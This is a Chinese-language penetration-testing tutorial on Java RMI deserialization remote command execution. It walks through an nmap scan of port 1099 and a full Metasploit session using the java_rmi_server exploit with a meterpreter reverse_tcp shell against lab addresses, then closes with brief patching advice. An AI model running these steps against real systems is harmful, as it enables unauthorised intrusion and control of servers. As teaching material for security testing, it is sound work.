6-17漏洞利用-反序列化远程命令执行漏洞

Java rmi介绍

Java RMI 指的是远程方法调用（Remote Method Invocation）。它是一种机制，能够让在某个java虚拟机上的对象调用另一个java虚拟机中的对象上的方法。

RMI是J2SE的一部分，能够让程序员开发出基于JAVA的分布式应用。一个rmi对象是一个远程JAVA对象，可以从另一个JAVA虚拟机上（甚至跨过网络）调用它的方法，可以像调用本地JAVA对象的方法一样调用远程对象的方法，是分布在不同的JVM中的对象的外表和行为都像本地对象一样。

我们这边有JVM1和JVM2，JVM1和JVM2可以进行来回的交互，JVM1可以调用JVM2上的方法，JVM2可以调用JVM1上的方法，通过RMI技术实现

对于任何一个以对象为参数的RMI接口，你都可以发一个自己构建的对象，迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。

RMI的传输100%基于反序列化。首先他要把字符串转化为对象，对象在经过反序列化转化为字符串，从而达到传输的效果

探测目标rmi

使用Nmap -p 1099 -sV IP地址探测目标的版本信息。

nmap -sV -p 1099 192.168.1.106

可以看到这里探测出对应的版本信息以及运行的服务，服务信息localhost

在实际情况下，肯定要使用漏洞扫描器，进行漏洞探测，但是我们可以直接将POC进行利用

rmi远程命令执行利用

使用Metasploit对rmi RCE漏洞利用。

实际上就是在metasploit中的模块，将我们系统的命令进行序列化，传输到rmi，在传递的过程中，rmi将传递的内容，转换为系统的命令，整个过程是因为metasploit构造了一个特殊的对象，在rmi server当中进行了执行，我们这里连接了server进行了一个对话，我们使用的模块是exploit

msfconsole
use exploit/multi/misc/java_rmi_server
show options
set rhosts 192.168.1.105
ifconfig
show payloads
set payload java/meterpreter/reverse_tcp
show options
set lhosts 192.168.1.103
exploit

sessions -l
sessions -i 1

?
//查看可以使用的命令

sysinfo

查看当前的系统信息

ps
//查看当前的进程信息

当然，我们也可以进行其它操作，使用meteasploit进行后渗透测试，上传下载，都可以

防御修复

1、存在反序列化传输。–特别注意，看是否可以利用反序列化漏洞执行系统命令

2、存在有缺陷的第三方库如commons-collections 及时升级库，或者改用其它的库，来代替这个存在缺陷的第三方库，这是我们需要做的。

在进行权限设置时，一定要注意，我们java的rmi进程，要具备执行我们系统的权限，或者只能执行一部分，在一定程度上，会限制系统命令的执行，达到防御的效果